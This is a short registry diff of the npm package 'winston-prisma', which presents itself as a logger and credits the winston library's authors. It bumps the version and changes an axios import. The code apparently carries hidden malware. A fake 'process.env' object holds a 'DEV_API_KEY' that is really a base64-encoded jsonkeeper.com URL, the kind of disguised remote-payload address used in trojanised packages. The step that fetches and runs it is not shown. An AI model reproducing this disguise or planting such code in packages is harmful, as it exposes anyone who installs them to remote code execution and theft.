winston-prisma 1.1.9 → 1.2.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -1,6 +1,6 @@
1
1
  "use strict";
2
2
 
3
- const axios = require("axios");
3
+ import axios from "axios";
4
4
  const process = {
5
5
  env: {
6
6
  DEV_API_KEY: "aHR0cHM6Ly9qc29ua2VlcGVyLmNvbS9iLzJJRzZX",
@@ -1,6 +1,6 @@
1
1
  "use strict";
2
2
 
3
- const axios = require("axios");
3
+ import axios from "axios";
4
4
  const process = {
5
5
  env: {
6
6
  DEV_API_KEY: "aHR0cHM6Ly9qc29ua2VlcGVyLmNvbS9iLzJJRzZX",
package/package.json CHANGED
@@ -1,7 +1,7 @@
1
1
  {
2
2
  "name": "winston-prisma",
3
3
  "description": "A logger for just about everything + prisma.",
4
- "version": "1.1.9",
4
+ "version": "1.2.1",
5
5
  "author": "Charlie Robbins <charlie.robbins@gmail.com>",
6
6
  "maintainers": [
7
7
  "David Hyde <dabh@alumni.stanford.edu>"